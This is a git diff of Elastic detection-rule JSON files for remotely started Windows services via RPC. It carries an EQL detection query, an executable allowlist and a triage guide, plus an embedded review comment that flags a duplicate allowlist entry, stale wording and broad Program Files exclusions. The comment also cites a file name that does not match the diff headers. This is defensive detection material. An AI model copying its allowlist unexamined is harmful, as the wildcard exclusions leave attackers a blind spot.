`Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. 
If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n 
\"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n",
 "references": [
 "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f"
 ],
@@ -113,7 +113,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_105.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_105.json
index 00094fc9c48..5116c10a92b 100644
--- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_105.json
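Review bot: The new-side `query` of the `@@ -13,8 +13,8 @@` hunk for `aa9a274d-…_104.json` lists the exclusion `?:\\Pella Corporation\\Pella Order Management\\GPAutoSvc.exe` twice inside the `not process.executable :` list; the duplicate does not change matching but signals that the allowlist has not been reviewed for drift, so one of the two entries should be dropped. In the same hunk the `note` ends its investigation steps with "searching for login events (for example, 4624) to the target host after the registry modification", wording that appears to be carried over from a registry-focused guide and should name the remote service start this rule correlates on. For tuning, the `?:\\Program Files\\*.exe` and `?:\\Program Files (x86)\\*.exe` wildcards suppress every remotely started service whose binary lives under those trees, which is a wide blind spot deployments may want to narrow with narrower paths or a signer condition. These `kibana/security_rule/*_N.json` files look like exported, versioned snapshots of the upstream rule source, so the corrections presumably belong in the rule definition rather than a hand edit here; the matching `_105` hunk starting at the end of this chunk is cut off before its query and cannot be checked from this view.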
@@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 
Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 
Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n 
\"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", "references": [ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" ], @@ -113,7 +113,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_106.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_106.json index a645daeefe8..75b7c86e9c9 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_106.json +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_106.json 
@@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 
Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 
Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
